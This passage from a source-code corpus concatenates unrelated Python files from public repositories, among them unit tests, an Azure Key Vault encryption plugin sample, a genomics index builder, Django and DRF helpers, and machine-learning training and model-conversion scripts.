self.assertEquals(set(['street', 'house_number']), set(dusty_schema.keys()))
def test_values(self):
doc = {'street': 'dogstoon',
'house_number': 1}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(set(['dogstoon', 1]), set(dusty_schema.values()))
class TestDustySpecsClass(DustyTestCase):
def test_finds_app_or_lib(self):
specs = DustySpecs(self.temp_specs_path)
self.assertEquals(specs.get_app_or_lib('app-a'), specs['apps']['app-a'])
self.assertEquals(specs.get_app_or_lib('lib-a'), specs['libs']['lib-a'])
def test_raises_without_app_or_lib(self):
specs = DustySpecs(self.temp_specs_path)
with self.assertRaises(KeyError):
specs.get_app_or_lib('non-existant-thingy')
def test_get_app_or_service(self):
specs = DustySpecs(self.temp_specs_path)
self.assertEquals(specs.get_app_or_service('app-a'), specs['apps']['app-a'])
self.assertEquals(specs.get_app_or_service('service-a'), specs['services']['service-a'])
|
DEQModel/utils/debug.py | JunLi-Galios/deq | 548 | 21546 | import torch
from torch.autograd import Function
class Identity(Function):
@staticmethod
def forward(ctx, x, name):
ctx.name = name
return x.clone()
def backward(ctx, grad):
import pydevd
pydevd.settrace(suspend=False, trace_only_current_thread=True)
grad_temp = grad.clone()
return grad_temp, None |
Configuration/ProcessModifiers/python/trackingMkFitTobTecStep_cff.py | Purva-Chaudhari/cmssw | 852 | 21568 | import FWCore.ParameterSet.Config as cms
# This modifier sets replaces the default pattern recognition with mkFit for tobTecStep
trackingMkFitTobTecStep = cms.Modifier()
|
Trakttv.bundle/Contents/Libraries/Shared/plugin/scrobbler/handlers/playing.py | disrupted/Trakttv.bundle | 1,346 | 21590 | from plugin.scrobbler.core import SessionEngine, SessionHandler
@SessionEngine.register
class PlayingHandler(SessionHandler):
__event__ = 'playing'
__src__ = ['create', 'pause', 'stop', 'start']
__dst__ = ['start', 'stop']
@classmethod
def process(cls, session, payload):
# Handle media change
if cls.has_media_changed(session, payload) and session.state in ['start', 'pause']:
yield 'stop', session.payload
# Handle current media
if cls.has_finished(session, payload):
if session.state in ['start', 'pause']:
yield 'stop', payload
elif session.state in ['create', 'pause', 'stop']:
yield 'start', payload
elif session.state == 'start':
yield None, payload
|
samples/features/sql-big-data-cluster/security/encryption-at-rest-external-key-provider/kms_plugin_app/custom_akv.py | aguzev/sql-server-samples | 4,474 | 21592 | <reponame>aguzev/sql-server-samples<filename>samples/features/sql-big-data-cluster/security/encryption-at-rest-external-key-provider/kms_plugin_app/custom_akv.py
# Placeholder for adding logic specific to application
# and backend key store.
#
import os
import json
import sys
from azure.identity import DefaultAzureCredential
from azure.keyvault.keys import KeyClient
from azure.keyvault.keys.crypto import CryptographyClient, EncryptionAlgorithm
# Append the current application path to sys path to be able to resolve local modules.
#
sys.path.append('.')
sys.path.append('./model')
from constants import ConfigurationConstants, Operations, CryptoConstants
import utils
from json_objects import EncryptDecryptRequest, JsonWebKeyResponse, EncryptDecryptResponse
def decrypt(request, json_key_attributes_dict, pin, version):
"""
This method will be called by the application entry point
for decrypting the payload.
request.value has the plaintext payload
request.alg contains the padding algorithm for encryption.
"""
set_env(json_key_attributes_dict, pin)
credential = DefaultAzureCredential()
key_vault_key = get_akv_key(json_key_attributes_dict, credential)
crypto_client = CryptographyClient(key_vault_key, credential=credential)
decrypted_payload = crypto_client.decrypt(EncryptionAlgorithm.rsa_oaep, request.value)
response = EncryptDecryptResponse(decrypted_payload.plaintext)
return response
def encrypt(request, json_key_attributes_dict, pin, version):
"""
This method will be called by the application entry point
for encrypting the payload.
request.value has the plaintext payload
request.alg contains the padding algorithm for encryption.
"""
set_env(json_key_attributes_dict, pin)
credential = DefaultAzureCredential()
key_vault_key = get_akv_key(json_key_attributes_dict, credential)
crypto_client = CryptographyClient(key_vault_key, credential=credential)
encrypted_payload = crypto_client.encrypt(EncryptionAlgorithm.rsa_oaep, request.value)
response = EncryptDecryptResponse(encrypted_payload.ciphertext)
return response
def get_key(json_key_attributes_dict, pin, version):
set_env(json_key_attributes_dict, pin)
credential = DefaultAzureCredential()
key_vault_key = get_akv_key(json_key_attributes_dict, credential)
# JsonWebKeyResponse expects integer inputs and converts them to byte array
# However AKV SDK already provides byte arrays for Exponent and Modulus.
# We will instantiate the object with a dummy value and then overwrite the
# exponent and module value.
#
dummy_val = 1
key_response = JsonWebKeyResponse(1,1)
key_response.e = utils.urlsafe_b64encode_as_str(key_vault_key.key.e)
key_response.n = utils.urlsafe_b64encode_as_str(key_vault_key.key.n)
return key_response
def get_akv_key(json_key_attributes_dict, credential):
"""
Gets the AKV key object.
"""
if "vault_url" in json_key_attributes_dict:
vault_url = json_key_attributes_dict["vault_url"]
else:
raise KeyError('vault_url was expected in the parameters but not found')
if "keyname" in json_key_attributes_dict:
key_name = json_key_attributes_dict["keyname"]
else:
raise KeyError('keyname was expected in the parameters but not found')
if "keyversion" in json_key_attributes_dict:
key_version = json_key_attributes_dict["keyversion"]
else:
raise KeyError('keyversion was expected in the parameters but not found')
key_client = KeyClient(vault_url=vault_url, credential=credential)
key_vault_key = key_client.get_key(key_name, key_version)
return key_vault_key
def set_env(json_key_attributes_dict, pin):
"""
Sets the environment variables for the MS identity credential lookup to work.
"""
if "azure_client_id" in json_key_attributes_dict:
key_version = json_key_attributes_dict["azure_client_id"]
else:
raise KeyError('azure_client_id was expected in the parameters but not found')
if "azure_tenant_id" in json_key_attributes_dict:
key_version = json_key_attributes_dict["azure_tenant_id"]
else:
raise KeyError('azure_tenant_id was expected in the parameters but not found')
os.environ["AZURE_CLIENT_ID"]=json_key_attributes_dict["azure_client_id"]
os.environ["AZURE_TENANT_ID"]=json_key_attributes_dict["azure_tenant_id"]
os.environ["AZURE_CLIENT_SECRET"]=pin
|
data_managers/data_manager_gatk_picard_index_builder/data_manager/data_manager_gatk_picard_index_builder.py | supernord/tools-iuc | 142 | 21612 | <gh_stars>100-1000
#!/usr/bin/env python
# <NAME>.
# Uses fasta sorting functions written by <NAME>.
import json
import optparse
import os
import shutil
import subprocess
import sys
import tempfile
CHUNK_SIZE = 2**20
DEFAULT_DATA_TABLE_NAME = "fasta_indexes"
def get_id_name(params, dbkey, fasta_description=None):
# TODO: ensure sequence_id is unique and does not already appear in location file
sequence_id = params['param_dict']['sequence_id']
if not sequence_id:
sequence_id = dbkey
sequence_name = params['param_dict']['sequence_name']
if not sequence_name:
sequence_name = fasta_description
if not sequence_name:
sequence_name = dbkey
return sequence_id, sequence_name
def build_picard_index(data_manager_dict, fasta_filename, target_directory, dbkey, sequence_id, sequence_name, jar, data_table_name=DEFAULT_DATA_TABLE_NAME):
fasta_base_name = os.path.split(fasta_filename)[-1]
gatk_sorted_fasta_filename = os.path.join(target_directory, fasta_base_name)
shutil.copy(fasta_filename, gatk_sorted_fasta_filename)
_sort_fasta_gatk(gatk_sorted_fasta_filename)
sam_index_filename = '%s.fai' % gatk_sorted_fasta_filename
if not os.path.exists(sam_index_filename):
sam_command = ['samtools', 'faidx', gatk_sorted_fasta_filename]
_run_command(sam_command, target_directory)
args = ['java', '-jar', jar, 'R=%s' % gatk_sorted_fasta_filename, 'O=%s.dict' % sequence_id]
_run_command(args, target_directory)
data_table_entry = dict(value=sequence_id, dbkey=dbkey, name=sequence_name, path=fasta_base_name)
_add_data_table_entry(data_manager_dict, data_table_name, data_table_entry)
def _run_command(command, target_directory):
tmp_stderr = tempfile.NamedTemporaryFile(prefix="tmp-data-manager-gatk_picard_index_builder-stderr")
proc = subprocess.Popen(args=command, shell=False, cwd=target_directory, stderr=tmp_stderr.fileno())
return_code = proc.wait()
if return_code:
tmp_stderr.flush()
tmp_stderr.seek(0)
sys.stderr.write("Error building index:\n")
while True:
chunk = tmp_stderr.read(CHUNK_SIZE)
if not chunk:
break
sys.stderr.write(chunk)
sys.exit(return_code)
tmp_stderr.close()
def _add_data_table_entry(data_manager_dict, data_table_name, data_table_entry):
data_manager_dict['data_tables'] = data_manager_dict.get('data_tables', {})
data_manager_dict['data_tables'][data_table_name] = data_manager_dict['data_tables'].get(data_table_name, [])
data_manager_dict['data_tables'][data_table_name].append(data_table_entry)
return data_manager_dict
def _move_and_index_fasta_for_sorting(fasta_filename):
unsorted_filename = tempfile.NamedTemporaryFile().name
shutil.move(fasta_filename, unsorted_filename)
fasta_offsets = {}
with open(unsorted_filename) as unsorted_fh:
while True:
offset = unsorted_fh.tell()
line = unsorted_fh.readline()
if not line:
break
if line.startswith(">"):
line = line.split(None, 1)[0][1:]
fasta_offsets[line] = offset
current_order = [x[1] for x in sorted((x[1], x[0]) for x in fasta_offsets.items())]
return (unsorted_filename, fasta_offsets, current_order)
def _write_sorted_fasta(sorted_names, fasta_offsets, sorted_fasta_filename, unsorted_fasta_filename):
with open(unsorted_fasta_filename, 'rb') as unsorted_fh, open(sorted_fasta_filename, 'wb+') as sorted_fh:
for name in sorted_names:
offset = fasta_offsets[name]
unsorted_fh.seek(offset)
sorted_fh.write(unsorted_fh.readline())
while True:
line = unsorted_fh.readline()
if not line or line.startswith(b">"):
break
sorted_fh.write(line)
def _int_to_roman(integer):
if not isinstance(integer, int):
raise TypeError("expected integer, got %s" % type(integer))
if not 0 < integer < 4000:
raise ValueError("Argument must be between 1 and 3999, got %s" % str(integer))
ints = (1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1)
nums = ('M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I')
result = ""
for i in range(len(ints)):
count = int(integer / ints[i])
result += nums[i] * count
integer -= ints[i] * count
return result
def _sort_fasta_gatk(fasta_filename):
(unsorted_filename, fasta_offsets, current_order) = _move_and_index_fasta_for_sorting(fasta_filename)
sorted_names = list(map(str, range(1, 100))) + list(map(_int_to_roman, range(1, 100))) + ['X', 'Y', 'M']
# detect if we have chrN, or just N
has_chr = False
for chrom in sorted_names:
if "chr%s" % chrom in current_order:
has_chr = True
break
if has_chr:
sorted_names = ["chr%s" % x for x in sorted_names]
else:
sorted_names.insert(0, "MT")
sorted_names.extend(["%s_random" % x for x in sorted_names])
existing_sorted_names = []
for name in sorted_names:
# Append each chromosome only once.
if name in current_order and name not in existing_sorted_names:
existing_sorted_names.append(name)
for name in current_order:
# TODO: confirm that non-canonical names do not need to be sorted specially
if name not in existing_sorted_names:
existing_sorted_names.append(name)
if existing_sorted_names == current_order:
shutil.move(unsorted_filename, fasta_filename)
else:
_write_sorted_fasta(existing_sorted_names, fasta_offsets, fasta_filename, unsorted_filename)
def main():
parser = optparse.OptionParser()
parser.add_option('-f', '--fasta_filename', dest='fasta_filename', action='store', type="string", default=None, help='fasta_filename')
parser.add_option('-d', '--fasta_dbkey', dest='fasta_dbkey', action='store', type="string", default=None, help='fasta_dbkey')
parser.add_option('-t', '--fasta_description', dest='fasta_description', action='store', type="string", default=None, help='fasta_description')
parser.add_option('-n', '--data_table_name', dest='data_table_name', action='store', type="string", default=None, help='data_table_name')
parser.add_option('-j', '--jar', dest='jar', action='store', type="string", default=None, help='GATK .jar file')
(options, args) = parser.parse_args()
filename = args[0]
with open(filename) as fh:
params = json.load(fh)
target_directory = params['output_data'][0]['extra_files_path']
os.mkdir(target_directory)
data_manager_dict = {}
if options.fasta_dbkey in [None, '', '?']:
raise Exception('"%s" is not a valid dbkey. You must specify a valid dbkey.' % (options.fasta_dbkey))
sequence_id, sequence_name = get_id_name(params, dbkey=options.fasta_dbkey, fasta_description=options.fasta_description)
# build the index
build_picard_index(data_manager_dict,
options.fasta_filename,
target_directory,
options.fasta_dbkey,
sequence_id,
sequence_name,
options.jar,
data_table_name=options.data_table_name or DEFAULT_DATA_TABLE_NAME)
# save info to json file
with open(filename, 'w') as fh:
json.dump(data_manager_dict, fh, sort_keys=True)
if __name__ == "__main__":
main()
|
django_for_startups/django_customizations/drf_customizations.py | Alex3917/django_for_startups | 102 | 21613 | # Standard Library imports
# Core Django imports
# Third-party imports
from rest_framework import permissions
from rest_framework.throttling import UserRateThrottle, AnonRateThrottle
# App imports
class BurstRateThrottle(UserRateThrottle):
scope = 'burst'
class SustainedRateThrottle(UserRateThrottle):
scope = 'sustained'
class HighAnonThrottle(AnonRateThrottle):
rate = '5000000/day'
class AccountCreation(permissions.BasePermission):
""" A user should be able to create an account without being authenticated, but only the
owner of an account should be able to access that account's data in a GET method.
"""
def has_permission(self, request, view):
if (request.method == "POST") or request.user.is_authenticated:
return True
return False
|
communications/migrations/0002_auto_20190902_1759.py | shriekdj/django-social-network | 368 | 21619 | <reponame>shriekdj/django-social-network
# Generated by Django 2.2.4 on 2019-09-02 11:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('communications', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='message',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='author_messages', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='message',
name='friend',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='friend_messages', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
tests/resources/test_codegen/template.py | come2ry/atcoder-tools | 313 | 21638 | <reponame>come2ry/atcoder-tools<filename>tests/resources/test_codegen/template.py
#!/usr/bin/env python3
import sys
def solve(${formal_arguments}):
return
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
${input_part}
solve(${actual_arguments})
if __name__ == '__main__':
main()
|
archived-stock-trading-bot-v1/utils/alerts.py | Allcallofduty10/stock-trading-bot | 101 | 21642 | import os
from sys import platform
def say_beep(n: int):
for i in range(0, n):
if platform == "darwin":
os.system("say beep")
|
test/PySrc/tools/collect_tutorials.py | lifubang/live-py-plugin | 224 | 21681 | import json
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, FileType
from pathlib import Path
def main():
parser = ArgumentParser(description='Collect markdown files, and write JSON.',
formatter_class=ArgumentDefaultsHelpFormatter)
project_path = Path(__file__).parent.parent.parent.parent
parser.add_argument('--source',
type=Path,
default=project_path / 'html' / 'tutorials')
parser.add_argument('--target',
type=FileType('w'),
default=str(project_path / 'html' / 'src' /
'tutorials.json'))
args = parser.parse_args()
tutorials = {}
# source_file: Path
for source_file in args.source.rglob('*.md'):
name = str(source_file.relative_to(args.source).with_suffix(''))
if name == 'README':
continue
source = source_file.read_text()
tutorials[name] = source
json.dump(tutorials, args.target)
main()
|
aim/pytorch.py | avkudr/aim | 2,195 | 21718 | <reponame>avkudr/aim
# Alias to SDK PyTorch utils
from aim.sdk.adapters.pytorch import track_params_dists, track_gradients_dists # noqa
|
diagrams/alibabacloud/analytics.py | bry-c/diagrams | 17,037 | 21728 | <reponame>bry-c/diagrams
# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _AlibabaCloud
class _Analytics(_AlibabaCloud):
_type = "analytics"
_icon_dir = "resources/alibabacloud/analytics"
class AnalyticDb(_Analytics):
_icon = "analytic-db.png"
class ClickHouse(_Analytics):
_icon = "click-house.png"
class DataLakeAnalytics(_Analytics):
_icon = "data-lake-analytics.png"
class ElaticMapReduce(_Analytics):
_icon = "elatic-map-reduce.png"
class OpenSearch(_Analytics):
_icon = "open-search.png"
# Aliases
|
test/python/echo_hi_then_error.py | WrkMetric/Python--NodeJS | 1,869 | 21732 | <reponame>WrkMetric/Python--NodeJS
print('hi')
raise Exception('fibble-fah') |
ansible/utils/check_droplet.py | louis-pre/NewsBlur | 3,073 | 21743 | <reponame>louis-pre/NewsBlur
import sys
import time
import digitalocean
import subprocess
def test_ssh(drop):
droplet_ip_address = drop.ip_address
result = subprocess.call(f"ssh -o StrictHostKeyChecking=no root@{droplet_ip_address} ls", shell=True)
if result == 0:
return True
return False
TOKEN_FILE = "/srv/secrets-newsblur/keys/digital_ocean.token"
droplet_name = sys.argv[1]
with open(TOKEN_FILE) as f:
token = f.read().strip()
manager = digitalocean.Manager(token=token)
timeout = 180
timer = 0
ssh_works = False
while not ssh_works:
if timer > timeout:
raise Exception(f"The {droplet_name} droplet was not created.")
droplets = [drop for drop in manager.get_all_droplets() if drop.name == droplet_name]
if droplets:
droplet = droplets[0]
print(f"Found the {droplet_name} droplet. IP address is {droplet.ip_address}. Testing ssh...")
ssh_works = test_ssh(droplet)
time.sleep(3)
timer += 3
print("Success!") |
tests/test_paddle.py | ankitshah009/MMdnn | 3,442 | 21772 | from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from conversion_imagenet import TestModels
from conversion_imagenet import is_paddle_supported
def get_test_table():
return { 'paddle' : {
'resnet50' : [
TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
TestModels.coreml_emit,
TestModels.keras_emit,
TestModels.mxnet_emit,
TestModels.pytorch_emit,
TestModels.tensorflow_emit
],
'resnet101' : [
#TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
TestModels.coreml_emit,
TestModels.keras_emit,
TestModels.mxnet_emit,
TestModels.pytorch_emit,
TestModels.tensorflow_emit
],
'vgg16' : [
TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
#TestModels.coreml_emit,
#TestModels.keras_emit,
#TestModels.mxnet_emit,
#TestModels.pytorch_emit,
#TestModels.tensorflow_emit
],
}}
def test_paddle():
if not is_paddle_supported():
return
# omit tensorflow lead to crash
import tensorflow as tf
test_table = get_test_table()
tester = TestModels(test_table)
tester._test_function('paddle', tester.paddle_parse)
if __name__ == '__main__':
test_paddle()
|
development_playgrounds/transformation_planar_flow_test.py | ai-di/Brancher | 208 | 21795 | <filename>development_playgrounds/transformation_planar_flow_test.py
import matplotlib.pyplot as plt
import numpy as np
import torch
from brancher.variables import ProbabilisticModel
from brancher.standard_variables import NormalVariable, DeterministicVariable, LogNormalVariable
import brancher.functions as BF
from brancher.visualizations import plot_density
from brancher.transformations import PlanarFlow
from brancher import inference
from brancher.visualizations import plot_posterior
# Model
M = 8
y = NormalVariable(torch.zeros((M,)), 1.*torch.ones((M,)), "y")
y0 = DeterministicVariable(y[1], "y0")
d = NormalVariable(y, torch.ones((M,)), "d")
model = ProbabilisticModel([d, y, y0])
# get samples
d.observe(d.get_sample(55, input_values={y: 1.*torch.ones((M,))}))
# Variational distribution
u1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u1", learnable=True)
w1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w1", learnable=True)
b1 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b1", learnable=True)
u2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u2", learnable=True)
w2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w2", learnable=True)
b2 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b2", learnable=True)
z = NormalVariable(torch.zeros((M, 1)), torch.ones((M, 1)), "z", learnable=True)
Qy = PlanarFlow(w2, u2, b2)(PlanarFlow(w1, u1, b1)(z))
Qy.name = "y"
Qy0 = DeterministicVariable(Qy[1], "y0")
#Qy._get_sample(4)[Qy].shape
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
number_iterations=400,
number_samples=100,
optimizer="Adam",
lr=0.5)
loss_list1 = model.diagnostics["loss curve"]
#Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
# Variational distribution
Qy = NormalVariable(torch.zeros((M,)), 0.5*torch.ones((M,)), "y", learnable=True)
Qy0 = DeterministicVariable(Qy[1], "y0")
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
number_iterations=400,
number_samples=100,
optimizer="Adam",
lr=0.01)
loss_list2 = model.diagnostics["loss curve"]
#Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
plt.plot(loss_list1)
plt.plot(loss_list2)
plt.show()
|
samples/archive/stream/stream.py | zzzDavid/heterocl | 236 | 21838 | import heterocl as hcl
hcl.init()
target = hcl.Platform.xilinx_zc706
initiation_interval = 4
a = hcl.placeholder((10, 20), name="a")
b = hcl.placeholder((10, 20), name="b")
c = hcl.placeholder((10, 20), name="c")
d = hcl.placeholder((10, 20), name="d")
e = hcl.placeholder((10, 20), name="e")
def add_mul(a, b, c, d, e):
@hcl.def_([a.shape, b.shape, c.shape])
def ret_add(a, b, c):
with hcl.for_(0, a.shape[0]) as i:
with hcl.for_(0, a.shape[1]) as j:
c[i, j] = a[i, j] + b[i, j]
@hcl.def_([c.shape, d.shape, e.shape])
def ret_mul(c, d, e):
# hcl.update(c, lambda x, y: a[x, y] * b[x, y], 'c_mul')
with hcl.for_(0, c.shape[0]) as i:
with hcl.for_(0, c.shape[1]) as j:
e[i, j] = c[i, j] * d[i, j]
ret_add(a, b, c)
ret_mul(c, d, e)
# compute customization
s = hcl.create_schedule([a, b, c, d, e], add_mul)
# op1 = add_mul.ret_add.c
# op2 = add_mul.ret_mul.c
# s[op1].pipeline(op1.axis[0], initiation_interval)
# stream into modules / device
a0, b0 = s.to([a, b], target.xcel)
d0 = s.to(d, target.xcel)
#s.partition(b0, dim=2, factor=2)
s.to([a0, b0], s[add_mul.ret_add])
s.to(d0, s[add_mul.ret_mul])
# within device move producer to consumer
s.to(c, s[add_mul.ret_mul],
s[add_mul.ret_add], depth=10)
# return tensor for inter-device move
# e0 = s.stream_to(e, hcl.CPU('riscv'))
# print(add_mul.ret_mul._buf, c._buf)
print(hcl.lower(s))
code = hcl.build(s, target)
print(code)
#
# with open("example.cl", "w") as f:
# f.write(code)
# f.close()
|
reagent/test/training/test_qrdqn.py | dmitryvinn/ReAgent | 1,156 | 21846 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import torch
from reagent.core.parameters import EvaluationParameters, RLParameters
from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData
from reagent.evaluation.evaluator import get_metrics_to_score
from reagent.models.dqn import FullyConnectedDQN
from reagent.training.parameters import QRDQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer
from reagent.workflow.types import RewardOptions
class TestQRDQN(unittest.TestCase):
def setUp(self):
# preparing various components for qr-dqn trainer initialization
self.params = QRDQNTrainerParameters(actions=["1", "2"], num_atoms=11)
self.reward_options = RewardOptions()
self.metrics_to_score = get_metrics_to_score(
self.reward_options.metric_reward_values
)
self.state_dim = 10
self.action_dim = 2
self.sizes = [20, 20]
self.num_atoms = 11
self.activations = ["relu", "relu"]
self.dropout_ratio = 0
self.q_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.action_dim,
sizes=self.sizes,
num_atoms=self.num_atoms,
activations=self.activations,
dropout_ratio=self.dropout_ratio,
)
self.q_network_target = self.q_network.get_target_network()
self.x = FeatureData(float_features=torch.rand(5, 10))
self.eval_parameters = EvaluationParameters(calc_cpe_in_training=True)
self.num_output_nodes = (len(self.metrics_to_score) + 1) * len(
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `actions`.
self.params.actions
)
self.reward_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe_target = self.q_network_cpe.get_target_network()
def _construct_trainer(self, new_params=None, no_cpe=False):
reward_network = self.reward_network
q_network_cpe = self.q_network_cpe
q_network_cpe_target = self.q_network_cpe_target
evaluation = self.eval_parameters
params = self.params
if new_params is not None:
params = new_params
if no_cpe:
reward_network = q_network_cpe = q_network_cpe_target = None
evaluation = EvaluationParameters(calc_cpe_in_training=False)
return QRDQNTrainer(
q_network=self.q_network,
q_network_target=self.q_network_target,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
metrics_to_score=self.metrics_to_score,
evaluation=evaluation,
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `asdict`.
**params.asdict()
)
def test_init(self):
trainer = self._construct_trainer()
quantiles = (0.5 + torch.arange(self.num_atoms).float()) / float(self.num_atoms)
self.assertTrue((torch.isclose(trainer.quantiles, quantiles)).all())
self.assertTrue((torch.isclose(trainer.reward_boosts, torch.zeros(2))).all())
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(reward_boost={"1": 1, "2": 2}),
)
reward_boost_trainer = self._construct_trainer(new_params=param_copy)
self.assertTrue(
(
torch.isclose(
reward_boost_trainer.reward_boosts, torch.tensor([1.0, 2.0])
)
).all()
)
def test_train_step_gen(self):
inp = DiscreteDqnInput(
state=FeatureData(float_features=torch.rand(3, 10)),
next_state=FeatureData(float_features=torch.rand(3, 10)),
reward=torch.ones(3, 1),
time_diff=torch.ones(3, 1) * 2,
step=torch.ones(3, 1) * 2,
not_terminal=torch.ones(3, 1), # todo: check terminal behavior
action=torch.tensor([[0, 1], [1, 0], [0, 1]]),
next_action=torch.tensor([[1, 0], [0, 1], [1, 0]]),
possible_actions_mask=torch.ones(3, 2),
possible_next_actions_mask=torch.ones(3, 2),
extras=ExtraData(),
)
mse_backward_type = type(
torch.nn.functional.mse_loss(
torch.tensor([1.0], requires_grad=True), torch.zeros(1)
).grad_fn
)
add_backward_type = type(
(
torch.tensor([1.0], requires_grad=True)
+ torch.tensor([1.0], requires_grad=True)
).grad_fn
)
mean_backward_type = type(
torch.tensor([1.0, 2.0], requires_grad=True).mean().grad_fn
)
# vanilla
trainer = self._construct_trainer()
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
self.assertEqual(type(losses[0].grad_fn), mean_backward_type)
self.assertEqual(type(losses[1].grad_fn), mse_backward_type)
self.assertEqual(type(losses[2].grad_fn), mse_backward_type)
self.assertEqual(type(losses[3].grad_fn), add_backward_type)
# no CPE
trainer = self._construct_trainer(no_cpe=True)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 2)
# seq_num
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(use_seq_num_diff_as_time_diff=True),
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# multi_steps
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(multi_steps=2)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# non_max_q
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(maxq_learning=False)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
def test_configure_optimizers(self):
trainer = self._construct_trainer()
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 4)
train_step_yield_order = [
trainer.q_network,
trainer.reward_network,
trainer.q_network_cpe,
trainer.q_network,
]
for i in range(len(train_step_yield_order)):
opt_param = optimizers[i]["optimizer"].param_groups[0]["params"][0]
loss_param = list(train_step_yield_order[i].parameters())[0]
self.assertTrue(torch.all(torch.isclose(opt_param, loss_param)))
trainer = self._construct_trainer(no_cpe=True)
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 2)
def test_get_detached_model_outputs(self):
trainer = self._construct_trainer()
q_out, q_target = trainer.get_detached_model_outputs(self.x)
self.assertEqual(q_out.shape[0], q_target.shape[0], 3)
self.assertEqual(q_out.shape[1], q_target.shape[1], 2)
|
qcodes/tests/test_sweep_values.py | riju-pal/QCoDeS_riju | 223 | 21853 | <filename>qcodes/tests/test_sweep_values.py
import pytest
from qcodes.instrument.parameter import Parameter
from qcodes.instrument.sweep_values import SweepValues
from qcodes.utils.validators import Numbers
@pytest.fixture(name='c0')
def _make_c0():
c0 = Parameter('c0', vals=Numbers(-10, 10), get_cmd=None, set_cmd=None)
yield c0
@pytest.fixture(name='c1')
def _make_c1():
c1 = Parameter('c1', get_cmd=None, set_cmd=None)
yield c1
@pytest.fixture(name='c2')
def _make_c2():
c2 = Parameter('c2', get_cmd=lambda: 42)
yield c2
def test_errors(c0, c1, c2):
# only complete 3-part slices are valid
with pytest.raises(TypeError):
c0[1:2] # For Int params this could be defined as step=1
with pytest.raises(TypeError):
c0[:2:3]
with pytest.raises(TypeError):
c0[1::3]
with pytest.raises(TypeError):
c0[:] # For Enum params we *could* define this one too...
# fails if the parameter has no setter
with pytest.raises(TypeError):
c2[0:0.1:0.01]
# validates every step value against the parameter's Validator
with pytest.raises(ValueError):
c0[5:15:1]
with pytest.raises(ValueError):
c0[5.0:15.0:1.0]
with pytest.raises(ValueError):
c0[-12]
with pytest.raises(ValueError):
c0[-5, 12, 5]
with pytest.raises(ValueError):
c0[-5, 12:8:1, 5]
# cannot combine SweepValues for different parameters
with pytest.raises(TypeError):
c0[0.1] + c1[0.2]
# improper use of extend
with pytest.raises(TypeError):
c0[0.1].extend(5)
# SweepValue object has no getter, even if the parameter does
with pytest.raises(AttributeError):
c0[0.1].get
def test_valid(c0):
c0_sv = c0[1]
# setter gets mapped
assert c0_sv.set == c0.set
# normal sequence operations access values
assert list(c0_sv) == [1]
assert c0_sv[0] == 1
assert 1 in c0_sv
assert not (2 in c0_sv)
# in-place and copying addition
c0_sv += c0[1.5:1.8:0.1]
c0_sv2 = c0_sv + c0[2]
assert list(c0_sv) == [1, 1.5, 1.6, 1.7]
